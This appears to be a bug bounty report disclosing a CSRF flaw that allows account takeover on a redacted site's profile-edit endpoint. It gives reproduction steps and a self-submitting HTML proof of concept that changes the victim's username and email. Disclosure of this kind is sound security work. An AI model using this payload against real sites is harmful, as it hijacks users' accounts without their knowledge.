CSRF leads to Account takeover

**Description:** During my search in this domain I found it vulnerable to CSRF so I tried to escalate it Account takeover and I succeed ## Impact Account takeover via CSRF ## System Host(s) ███████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce Vulnerable domain and endpoint : https://██████████/account/profile/edit 1. Click on this URL: https://█████████/account/register and fill in the required fields. 2. You will be instructed to check your inbox for a verification email, but you can avoid this step and log in using the username and password you created on the registration page. 3. Navigate to this endpoint https://███████/account/profile/edit and attempt to modify the first name and email and password. 4. Observe this in the history of Burp Suite: https://███/account/profile/edit. 5. You can notice there is no protection against CSRF on this endpoint. 6. Executed the proof of concept (POC), and it worked. ##POC ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://████████/account/profile/edit" method="POST"> <input type="hidden" name="username" value="hacker" /> <input type="hidden" name="password" value="" /> <input type="hidden" name="cpassword" value="" /> <input type="hidden" name="email" value="mojejas248&#64;esterace&#46;com" /> <input type="hidden" name="save" value="Save" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` ## Suggested Mitigation/Remediation Actions